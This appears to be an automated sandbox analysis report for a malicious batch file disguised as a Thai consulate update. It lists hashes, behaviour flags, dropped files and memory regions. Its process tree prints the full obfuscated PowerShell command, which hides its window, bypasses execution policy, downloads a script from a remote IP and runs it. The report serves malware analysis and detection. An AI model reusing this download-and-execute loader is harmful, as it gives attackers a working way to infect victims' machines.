Analysis

  • max time kernel
    43s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64 · arch:x86 · image:win7-20220812-en · locale:en-us · os:windows7-x64 · system
  • submitted
    26-09-2022 20:26

General

  • Target

    Thailand/Th-Pass/Consulate-update.bat

  • Size

    42KB

  • MD5

    bdd44c10654add788dcba23da9089978

  • SHA1

    33c482e714965393305acbdf9a596e20ce09d5c2

  • SHA256

    11dd5d54f65eedcf032a3424a2fb4bc558f00574a8c26590ef234249f5738638

  • SHA512

    49fdd5de2f6654ac0e9f4ccd0bcfb4db6b60feaa28e39b3678b49907ebaab6970b14c4d5f38a61f07cb2d23ef5a18536dcd483c9b8988fe23a67329c19b19e52

  • SSDEEP

    96:fEOEY6iJOAFOg7OPV1Hzf7yAMHteKOVXO6zfMHg:xxCPQtuY82g

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Thailand\Th-Pass\Consulate-update.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\system32\cmd.exe
      CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F='IEX(NEW-OBJECT NET.W';$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6='EBCLIENT).DOWNLO';[BYTE[]];$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567='DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82(''http://209.209.41.33/p400/Good.txt'')'.REPLACE('DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82','ADSTRING');[BYTE[]];IEX($129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F+$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6+$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F='IEX(NEW-OBJECT NET.W';$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6='EBCLIENT).DOWNLO';[BYTE[]];$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567='DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82(''http://209.209.41.33/p400/Good.txt'')'.REPLACE('DE174A186FAD3BB53FE142DD1C93BD111913F8BD77DEDAF0E2ED70ECC90CE0CD03B847C0F4F684903D78B6FF3B9B3EA291D320446288A48454EABC96FFAAECD768A0852098933A04647B2ABDBED8232C5D84E898E01205F0069F53491BB25D726E981F82','ADSTRING');[BYTE[]];IEX($129F29E509EE1E6D662A0B698BDF443126FA22909A9349C94278092BF242DD93098499B04C136E7ADA949394E89B212D513F259ED2696AC253DCD7669BBB4FD51247E2A4AE3B89DE3009D38AC962B72526A0E0466B8D6D591F76329D69F3A36129647D7F+$7963E940A67F915107B59D095A281E4CE30DF7582C32129F47D4A5C1D24EF4518A63BE44FDD42CBBF90038A28C98D007379FF5F862D768EA26D3E35589780C0BB9F36D7721E74888CED8DCC292B2950465E86E9902C3377D999CFA583B7E0598E20E40D6+$27F2F64A5D6C55B4B8B28BD912D1F3DB10240D9DF48FBB7EAD548E593A990F262BBD2E6D883EE197935F64B79173142463F4563C6707428F1D1D2E4CD294DA9D53AF2D4D993C405BA28005DD6002631196C1B00D13D19D687C4FE190D1775ED613D50567)
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powershell < C:\Users\Admin\AppData\Roaming/educational.png
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:272
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1644

Network

MITRE ATT&CK Matrix


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d9d53f31db5bd7c16cb357306fdf549b

    SHA1

    454d9faa0b0ec41bd609580a21c9f4a7cd1d1e36

    SHA256

    fd56bd3189d2f3eb81ff44708e89ffe0221ab55e792d34aa28f70ad8a879ebc1

    SHA512

    d6418b12304b8e58db17907bc9c5619d041c5190c58301841b124001d824b5044b7401ea4b96d0aa9d6ac89e48828a0521c5a96dad366d6813c11ad47a521368

  • C:\Users\Admin\AppData\Roaming\educational.png
    Filesize

    251B

    MD5

    292374cd21675135acb516497a730fd9

    SHA1

    f6e019093fc9a0952b7ae2c536b0b9f37071d0bf

    SHA256

    86cf5e4e86c0aae75158c04e13051275c341af7bf54b7a7cd49eced95d21b1b0

    SHA512

    491623e21d1740e234925bf0d1df1ac6402404bbcbad1d3e926ebdca0eeb55e1ab2322d38c7501f28b0a8deda853e087bfc22f34ca9b63995428ba8a3c03da32

  • memory/272-62-0x0000000000000000-mapping.dmp
  • memory/1004-54-0x0000000000000000-mapping.dmp
  • memory/1516-59-0x00000000026F4000-0x00000000026F7000-memory.dmp
    Filesize

    12KB

  • memory/1516-55-0x0000000000000000-mapping.dmp
  • memory/1516-60-0x000000001B780000-0x000000001BA7F000-memory.dmp
    Filesize

    2MB

  • memory/1516-61-0x00000000026FB000-0x000000000271A000-memory.dmp
    Filesize

    124KB

  • memory/1516-57-0x000007FEF3B90000-0x000007FEF45B3000-memory.dmp
    Filesize

    10MB

  • memory/1516-68-0x00000000026FB000-0x000000000271A000-memory.dmp
    Filesize

    124KB

  • memory/1516-56-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmp
    Filesize

    8KB

  • memory/1516-58-0x000007FEF3030000-0x000007FEF3B8D000-memory.dmp
    Filesize

    11MB

  • memory/1516-66-0x00000000026F4000-0x00000000026F7000-memory.dmp
    Filesize

    12KB

  • memory/1644-64-0x0000000000000000-mapping.dmp
  • memory/1644-69-0x000007FEF3B90000-0x000007FEF45B3000-memory.dmp
    Filesize

    10MB

  • memory/1644-70-0x000007FEEF250000-0x000007FEEFDAD000-memory.dmp
    Filesize

    11MB

  • memory/1644-71-0x00000000027D4000-0x00000000027D7000-memory.dmp
    Filesize

    12KB

  • memory/1644-72-0x000000001B740000-0x000000001BA3F000-memory.dmp
    Filesize

    2MB

  • memory/1644-73-0x00000000027DB000-0x00000000027FA000-memory.dmp
    Filesize

    124KB

  • memory/1644-74-0x00000000027D4000-0x00000000027D7000-memory.dmp
    Filesize

    12KB